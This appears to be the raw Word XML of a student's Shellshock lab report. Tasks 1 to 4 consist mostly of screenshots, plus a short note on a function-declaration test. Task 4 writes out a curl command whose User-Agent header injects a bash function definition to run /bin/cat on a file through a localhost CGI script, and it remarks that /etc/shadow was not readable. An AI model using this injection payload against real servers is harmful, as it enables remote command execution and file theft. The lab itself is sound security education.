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275EE" w14:textId="77777777" w:rsidR="001803EA" w:rsidRDefault="001803EA"/>
    <w:p w14:paraId="49062208" w14:textId="1A3DC45A" w:rsidR="00B821E0" w:rsidRDefault="00B821E0">
      <w:r>
        <w:t>Shell Shock Attack Task #1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745AEC10" w14:textId="330B1C32" w:rsidR="00B64D3A" w:rsidRDefault="00B64D3A">
      <w:r>
        <w:t>After weeks of on and off I found an additional space in the function declaration(foo=’</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B64D3A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)_echo “hello world”;_}; echo ‘extra’;’) stopped the bug. The textbook</w:t>
      </w:r>
      <w:r w:rsidR="00427327">
        <w:t xml:space="preserve"> also</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> seem</w:t>
      </w:r>
      <w:r w:rsidR="00427327">
        <w:t xml:space="preserve">ed </w:t>
      </w:r>
      <w:r>
        <w:t>to have the space</w:t>
      </w:r>
      <w:r w:rsidR="00427327">
        <w:t>. Deleted it fixed my problems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBF1798" w14:textId="6B4C0AC6" w:rsidR="00B821E0" w:rsidRDefault="00B64D3A">
      <w:r w:rsidRPr="00B64D3A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F463FD2" wp14:editId="456916FA">
            <wp:extent cx="5943600" cy="39624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6507" w14:textId="77777777" w:rsidR="00B821E0" w:rsidRDefault="00B821E0"/>
    <w:p w14:paraId="052351E7" w14:textId="37DB5700" w:rsidR="00B821E0" w:rsidRDefault="00B821E0">
      <w:r>
        <w:t>Shell Shock Assignment Task #2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B679C1" w14:textId="1F7CB192" w:rsidR="00B821E0" w:rsidRDefault="00B821E0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="652CD22B" wp14:editId="1CFD2E06">
            <wp:extent cx="3664423" cy="24429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618" cy="2451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E94F5" w14:textId="368C2FE4" w:rsidR="00B821E0" w:rsidRDefault="00B821E0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BBF2429" wp14:editId="7AC6896C">
            <wp:extent cx="3664424" cy="24429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338" cy="244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615F2" w14:textId="4689D85A" w:rsidR="00B821E0" w:rsidRDefault="00B821E0">
      <w:r>
        <w:t>Shell Shock Assignment Task#3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313DD4C1" w14:textId="4AFFA5C7" w:rsidR="000B0FEE" w:rsidRDefault="000B0FEE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26E2305E" wp14:editId="1ABA8AAA">
            <wp:extent cx="4605707" cy="3070471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228" cy="308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A55425" w14:textId="4C457850" w:rsidR="00B821E0" w:rsidRDefault="00B821E0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AD1275C" wp14:editId="02E68731">
            <wp:extent cx="3500652" cy="2333768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324" cy="2338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58036" w14:textId="2FEF1A70" w:rsidR="00427327" w:rsidRDefault="000479BF">
      <w:r>
        <w:t>Shellshock Task 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D60E63" w14:textId="39A5A4DA" w:rsidR="000479BF" w:rsidRDefault="000479BF">
      <w:r>
        <w:t xml:space="preserve">I created a file called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SuperSecretFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> which was able to be accessed when I ran the command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B20CAC" w14:textId="23EF1A46" w:rsidR="000479BF" w:rsidRDefault="000479BF">
      <w:r w:rsidRPr="000479BF">
        <w:t xml:space="preserve">curl -A"() </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000479BF">
        <w:t>{ echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000479BF">
        <w:t xml:space="preserve"> hello;}; echo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000479BF">
        <w:t>Content_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000479BF">
        <w:t>: text/plain; echo; /bin/cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000479BF">
        <w:t>superSecretFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000479BF">
        <w:t>" http://localhos t/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000479BF">
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000479BF">
        <w:t>-bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000479BF">
        <w:t>myprog.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D88B757" w14:textId="26CFC47A" w:rsidR="000479BF" w:rsidRDefault="000479BF">
      <w:r w:rsidRPr="000479BF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="187E43FD" wp14:editId="653150A1">
            <wp:extent cx="5943600" cy="39624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3605" w14:textId="6ADEE5A9" w:rsidR="000479BF" w:rsidRDefault="000479BF">
      <w:r>
        <w:t xml:space="preserve">You can’t steal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/shadow because it is only readable by root and the webserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041D85BA" w14:textId="77777777" w:rsidR="00090DFE" w:rsidRDefault="00090DFE"/>
    <w:p w14:paraId="5110D365" w14:textId="22FD0DF0" w:rsidR="000B0FEE" w:rsidRDefault="000B0FEE"/>
    <w:sectPr w:rsidR="000B0F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1E0"/>
    <w:rsid w:val="000479BF"/>
    <w:rsid w:val="00090DFE"/>
    <w:rsid w:val="000B0FEE"/>
    <w:rsid w:val="001164AE"/>
    <w:rsid w:val="001803EA"/>
    <w:rsid w:val="00326D73"/>
    <w:rsid w:val="0041312D"/>
    <w:rsid w:val="00427327"/>
    <w:rsid w:val="00B64D3A"/>
    <w:rsid w:val="00B82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437AA"/>
  <w15:docId w15:val="{6D1F8C12-F514-4609-9831-FB88194AD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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-16T15:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-16T15:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>